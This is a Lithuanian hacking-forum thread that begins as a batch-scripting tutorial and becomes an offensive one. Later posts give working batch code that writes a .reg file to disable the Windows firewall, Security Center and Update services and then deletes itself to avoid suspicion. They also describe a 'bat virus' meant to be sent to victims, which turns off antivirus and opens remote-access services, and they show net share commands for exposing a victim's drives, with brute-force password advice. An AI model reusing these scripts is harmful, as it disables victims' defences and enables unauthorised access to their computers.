Bat scriptinimas

[mrg]

____________________Bat scriptinimo pradziamokslis____________

Bat scriptinimas susideda is dos komandu, rasomas i tekstini dokumenta ir baige scripta, issaugome pletiniu bat arba cmd.(pvz scriptas.bat arba scriptas.cmd). Noredami ji redaguoti arba perziureti jos turini ant rinkmenos spaudziame desini klavisa ir pasirenkame "edit".
Pabandysime sukurti paprasta bat scripta. I tekstini dokumenta irasome:

regedit
pause

regedit - iskviecia registro valdymo tvarkykle
pause sustabdo komandine eilute, jei nenorime, kad viskas butu sustabdyta tada sios komandos nerasykite.

Idemiau isiziureje galime pastebeti visokius irasus kuriu nenorime matyti paleide bat faila, kur jis buvo paleistas, kokios komandos buvo vykdomos, trumpiau tariant viskas parodoma atviromis kortomis.

Tarkim reikia paslepti komandas, kad pasaline akis ju nematytu, tai scripto pradzioje iveskime "echo off"

echo off
regedit
pause

bus matomas tik "echo off" uzrasas, likusieji ne, bet jei scripta pakoreguotume:

echo off
echo regedit
pause

tai bus matomi "echo off" ir "regedit", bet po echo regedit komanda siuo atveju nebus ivykdoma, o bus pateiktas, kaip uzrasas, kuri galesime pamatyti, kaip rezultata. Ir jeigu
pakeisime zodi "off" i "on" tai bus pateikta, be jokiu paslepimu, t.y bus matoma "direktorija" is kur paleista buvo, kokios komandos buvo vykdomos, parasyti uzrasai.

O jeigu mums svarbiausia paslepti visus duomenis, is kur buvo paleista, kokios komandos vykdomos, tereikia prirasyti @ zenkliuka, o pirmoji eilute atrodytu:

@echo off

Uzrasai bus matomi. Atminkite visas jusu komandos bus atliktos nuosekliai.

Kartais gali prireikti, sukurti scripta, kuris paleistu viena ar kita programa. Nukopijuojame, jos adresa "directory", ir nukopijuojame i teksto redaktoriu "notepad", tarkim musu tikslas paleisti nmap:

C:\nmap\nmap-3.999

o jeigu pries sia komanda parasysime start, tai komanda bus ivykdyta kitame komandines eilutesl ange, bet deja ivykdys tokiu greiciu, kad nespesit perskaityti visa informacija isvedama i langa, tada teks ivykdyti sia komanda, bet ji po trumpo laiko dings:

C:\nmap\nmap-3.999 stop

Kartais gali prireikti, kad 2x spragtelejus bat scripta, reiktu koreguoti teksta ar kito failo vidurius su "notepad" esanti tam tikroje vietoje:

start notepad c:\superapp.out

Ivykdzius pirmakart sia komanda, bus pasiulyta ar norite sukurti faila "superapp.out" (galima sugalvoti ir savo "directory", kur jis bus issaugotas, pavadinima, jei nenurodysite pletinio (pvz: exe, doc, bat, jpg,avi,...) bus nustatytas kaip tekstinis dokumentas. Sutike (paspaudus "yes") ji sukurs ir iskvies "notepad", kuriuo galesite modifikuoti faila.
Bet jei musu tikslas neparodyti, kad bus sukurtas tam tikras failas, tada musu scriptas atrodys taip:

call superapp>c:\superapp.out

Galime savo nuoziura irasyti "@echo off" i kodo pradzia.

Kartais reikalinga komanda, kuri galetu ivydyti viena veiksma, o jei jis negalimas, tada butu iskvieciama kita komanda, todel panaudosime "goto":

@echo off
format a:
if not errorlevel 1 goto end
echo neivykdzius pirmos komandos, bus rodomas sis uzrasas

Komanda patys galite pakeisti, patobulinti ir panaudoti savais tikslais, trecioje eiluteje sios komandos "if not errorlevel 1 goto end" nekeiskite. ISPEJIMAS: paziurekite ar nera jusu kompiuteryje ideto diskelio ir nesumastykite ideti diskeli su svarbiais duomenimis pasirodzius uzrasui "Insert new disk for drive A: and press ENTER when ready", o jus
paspauskite ENTER ir pamatysite ketvirtos eilutes uzrasa!
Galime panaudoti ir sudetingesni atveji:

IF EXIST aplankas. (del aplankalas.) ELSE echo aplanko nera

jei egzistuoja "aplankas", tada jis pasalintas, jei ne, isvedama "aplanko nera"

arba:

goto answer%errorlevel%
:answer0 jei atsakymas 0
echo Program had return code 0 tai bus vykdoma si komanda
:answer1 bet jei atsakymas 1
echo Program had return code 1 kitas variantas
goto end
:end
echo done!

Tarkim, kad paleidom musu sukurta scripta ir jis ismete "error"- ivyko klaida ir komandines eilutes langas issijungia, o mes nenorime kad jis issijungtu, tada truputi modifikuojam koda:

@echo off
:begin
format a:
echo Idekite diskeli, irenginyje jis nerastas!
pause
goto begin

Programuojant bat scripta, gali prireikti komentarai ir kita informacija neisvedama i galini rezultata.

@echo off
rem Si programa formatuoja ir patikrina diska
rem ieskoma failo check.bat
rem
echo Prasome ideti nauja diska
pause
format b: /v
chkdsk b:
pause


Hakinime reikalinga komanda, kuri sukurtu registro faila aplankale ("Temp"-laikinu failu "directorija"), kuri gali pakeisti registro struktura:

> "%Temp%.\kill.reg" ECHO REGEDIT4

Si komanda sukuria registro faila
C:\Documents and Settings\Vartotojo vardas\Local Settings\Temp
Ir pamatysime "kill.reg" byla nurodytame aplankale, kuriame bus vienintelis irasas "REGEDIT4":

>>"%Temp%.\kill.reg" ECHO.

"kill.reg" registro byloje bus praleista eilute.


ECHO gali buti be tasko, pridedamos eilutes su turiniu einanciu po ECHO komandos:

>>"%Temp%.\kill.reg" ECHO
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess]
>>"%Temp%.\kill.reg" ECHO "Start"=dword:00000004

SharedAccess- atsakingas uz kompiuterio dalijimus, saugoma visa informacija apie juos. Jei neaisku duosiu pavizdi kaip reikia padalinti byla ar kita dokumenta tinkle esanciam kompiuterui, ant bet kokios bylos spaudziame desine peles klavisa, pasirenkame "properties",
o tada isirenkama skilti "sharing". Trecioje eiluteje i registro rakta irasoma, kokia reiksme reikes nurodyti, musu atveju bus 00000004, kuri atjungia si "servisa".
Paabandysiu aprasyti kita idomu "servisa", kuris atsako uz windows update (win sistemos atnaujinimus).

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv]

Kitas registro raktas, kuris isjungia ant windows xp esama "security Center"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wscsvc]
"Start"=dword:00000004

Sie registro paaiskinimai butu nieko verti jei, ju negaletume realizuoti, paleide bat scripta padaryti pakeitimus sistemoje:

START /WAIT REGEDIT /S "%Temp%.\kill.reg"

Ir kad nekiltu itarimu istrinsime "kill.reg"

DEL "%Temp%.\kill.reg"
DEL %0


daugiau dos komandu rasite http://www.gamezone.lt/diskusijos/viewtopic.php?t=3351

_____Pradziamokslio pabaiga__by mrg

[unixgirl]

Neblogas pradziamokslis, keli mazi netikslumai. Tikiuosi toliau tobulesi skriptindamas ir pasidalinsi savo ziniomis.

Idemiau isiziureje galime pastebeti visokius irasus kuriu nenorime matyti paleide bat faila.

Mes matome kaip musu skriptas vykdomas. Tai pravercia ieskant klaidu skripte.

>>"%Temp%.\kill.reg" ECHO
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess]
>>"%Temp%.\kill.reg" ECHO "Start"=dword:00000004

Negalima skripto rasyti per dvi eilutes ir neteisingas SharedAccess apibudinimas.


Dabar mazas testas. Pasileisk servisu konsole susirask Windows Firewall/Internet Connection Sharing (ICS) servisa
Ir isbandyk siuos du skriptus:

Kodas: Pasirinkti visus

> "%Temp%.\kill.reg" ECHO REGEDIT4
>>"%Temp%.\kill.reg" ECHO.
>>"%Temp%.\kill.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess]
>>"%Temp%.\kill.reg" ECHO "Start"=dword:00000004
START /WAIT REGEDIT /S "%Temp%.\kill.reg"
DEL "%Temp%.\kill.reg"
DEL %0

Kodas: Pasirinkti visus

> "%Temp%.\kill.reg" ECHO REGEDIT4
>>"%Temp%.\kill.reg" ECHO.
>>"%Temp%.\kill.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess]
>>"%Temp%.\kill.reg" ECHO "Start"=dword:00000002
START /WAIT REGEDIT /S "%Temp%.\kill.reg"
DEL "%Temp%.\kill.reg"
DEL %0

Kas karta po skripto paleidimo padaryk refresh servisu konsoleje ir parasyk kaip pasikeicia po kiekvieno skripto Firewall/Internet Connection Sharing (ICS) serviso Status ir Startup Type.

Ir pasakyk kaip tu manai, kodel pirmas skriptas naudingas isibroveliui.

P.S.
DEL "%Temp%.\kill.reg" kaip minejai istrins kill.reg
DEL %0 istrins bat faila su siuo kodu, jei nenori, per nauja pastinti kodo, gali paskutines kodo eilutes nenaudoti

[mrg]

Palei "default" servisas suprantama buvo isjungtas, todel pries bandyma teko ji ijungti. Pries bandyma serviso duomenys:
Startup type: manual
Service status: Started

Po pirmo scripto paleidimo:
Startup type: disabled
Service status: Started

Po antro scripto paleidimo:
Startup type: automatic
Service status: Started

Pabandziau pirma scripta isjungtam servisui:
Startup type: manual
Service status: Started

Po rezultatu turetu visiems buti aisku, kodel pirmas scriptas naudingesnis kompiuteriniam isibroveliui, nes jis isjungia ICS servisa. Tik niekaip nesupratau, kodel neisejo pakeisti Service status? O kokia komanda ji pakeicia?

[Svečias]

Po rezultatu turetu visiems buti aisku, kodel pirmas scriptas naudingesnis kompiuteriniam isibroveliui, nes jis isjungia ICS servisa. Tik niekaip nesupratau, kodel neisejo pakeisti Service status? O kokia komanda ji pakeicia?

Deja ne visiems aisku ir tau paciam neaisku, bet tu zinosi simtu procentu, nes tu klausai zmoniu. As kolkas nenoriu nieko rasyti apie registry, bet zodis Startup reishkia kompiuterio startavima ir reiskia visi pasikeitimai bus po restartavimo. ( Nors tai nera ideali isheitis, nes niekada nezinai kokios programos saugo kitas programas)

Matai tu suzinojai apie skriptinima, apie servisus ir tu zinai daugiau, nei 99% procentai Windows vartotoju, bet per mazai, kad galvotum pats. Tai normalu ir sioje stadijoje daznai zmones pasiduoda.
Man patinki, kad nori buti geresniu uz kitus... pamirsh ARP ka GodHack parase as tau paaiskinsiu...
Geriau pabandyk paziureti kas yra per daiktas netsh komandineje eiluteje. Toliau mokinkis bat scriptinimo as zinau, kad tu dar nesupranti koks galingas ginklas tai yra. Man nereikia , kad moketum skripta paaiskinti, man reikia, kad tu moketum juom naudotis ir ji kurti.

Kai atsibos mokintis parashyk man ir as pagal tavo languard pasakysiu ka as daryciau, kad ta kompa uzvaldyti ir mes taikiai ishsiskirsime be klausimu.

[Xgreem]

http://www.ericphelps.com/batch/

Neblogas saitas mokintis

[mrg]

________________________________Bat virusas___________________________________
Pasinaudojes bat skriptinimo technologija sukuriau bat virusiuka. Jo bruozai:

enable telnet service
enable messenger service
enable Remote registry servise
enable NetMeeting Remote Desktop Sharing service

disable Nod32
disable Dr. Web
disable alg service
disable avast antivirus
disable outpost firewall
disable eTrust antivirus
disable kaspersky antivirus
disable System Restore service
disable security center service
disable Help and Support service
disable Automatic updates service
disable Performance Logs and Alerts service
disable Windows Firewall/Internet Connection Sharing (ICS)

Failo pavadinimas: server.exe
uzkretimas: aktyvuojant faila server.exe
uzkrato aktyvavimas: restartuojant arba is naujo ijungus kompiuteri
tikslas: nusiunciame aukai noredami gauti priejima prie jo kompiuterio, pasalindami kliutis (pasalinant nuo krovimosi antivirusines, ugniasienes , ijungiant pavojingus servisus, naudingus isilauzeliui, isjungiant aukai nepalankius)
failo dydis: 82.1 KB

Jei pastebejote klaidu ar turite pasiulymu, mielai isklausysiu.

siustis: cia
arba cia
kurejas: mrg

[MaksasMks]

MRG tavo nikas kitam forume asas?
http://www.antisecurity.org/showthread.php?t=380

[DF]

Fui, užuodžiu smarvę.

[mrg]

Deja, taip bet kokia to niko istorija buvo. Reikejo uzsiregistruot greit tai dazniausiai mano vedamas i user laukeli budavo: asas, tai nuo to ir prasidejo. O pala, nejau ir as is abieju forumu uzuodziu ta pati kvapeli?
P.S as autoriniu teisiu nepazeidineju

[DF]

antisecurity.org forumas yra tikrų tikriausia nesamone.

[Šaras]

Nu mūs hack skilties su j forumu nepalyginsi. Ten betkoks lolas gali kanors išmokt, o čia...

[GODhack]

Ten viskas ko galima ismokt ^C ^V nuo topiko eksploita isaugot pl formatu ir tada burtazodis:
perl bla.pl
Ir viskas, kad kas nors daugiau butu parasyta nemaciau.

Ten dar yra toks 1karolis kur toki burtazodi jau moka ir meta ten kieciausia is visu, net uz pinigus parsidavineja kaip kale .

[mrg]

Mane nervina, kad is tu video tut, ismoke lohai defeisina viska iseiles, vaidina belekokiais ereliais, tipo jie pasaulio bamba. Jeigu toks man pakliutu po ranka, pigiai neatsipirktu. Nerasynekit ne i tema.

[DF]

Nu jai jau pradėjom tai

Teisybe GODhack sakai, tas 1karolis sakė kad mane nuhakins per skype bug'a Tai va pasiklausęs tokių nesamonių tikrai nuotaiką pasikeli.

[mrg]

Panaudosime komanda net share apsunkindami aukai gyvenima. Pirmiausia gali iskilti klausimas, kokia nauda duos si komanda? Pasistengsiu atsakyti aiskiai. Auka paleidusi tam tikra bat skriptuka, kuris pasharina C:/D: ( ar kitokius kietuosius diskus, aplankalus) leidzia bet kuriam su share scanner pamatyi ju turini. Dazniausiai atsitiks taip, kad pasharine kietuosius diskus visisko priejimo negausite, kol nesuzinosite aukos admin slaptazodi, o
tai galima pabandyti naudojant brute force ataka. Kad visas perrinkimas netruktu pakankamai ilgai, naudokites zodyno ataka (dictionary attack), jos principu visi zodziai bus perrenkami norinyt isgaut slaptazodi, jei zodynas skurdus, nebusit nieko pese, todel pries brute forcinant teks apsirupint tinkamu zodyneliu.
Komandos aprasytos zemiau, bus galima ivikdyti komandineje eiluteje arba bat skripte.
Noredami viska patys isbandyti C: diske sukurkite aplankala "DATA" (be kabuciu).

net share DataShare=c:\Data /remark:"komentaras"

Share name: DataShare
c:\Data aplankalas, kuris bus sharinamas
Comment: komentaras
Paleidus sia komanda komandineje eiluteje arba bat skriptuke, nueikite i c: diska
paspauskite F5 (refresh) ir ant Data aplankalo turetu pasirodyti dosni rankele spauskite ant to aplankalo desini mygtuka, pasirinkite properties, tada pasirinkite sharing kortele,ir matysite ivykusius pakeitimus.
Taip pat galite irasyti /users:5 (bus nustatytas penkiu lankytoju limitas), o jei nereikia limito, rasykite /unlimited
Noredami panaikinti irasykite

net share DataShare /delete

manau norintiems tikrai sunku nebus pasharinti kitas kietojo disko vietas.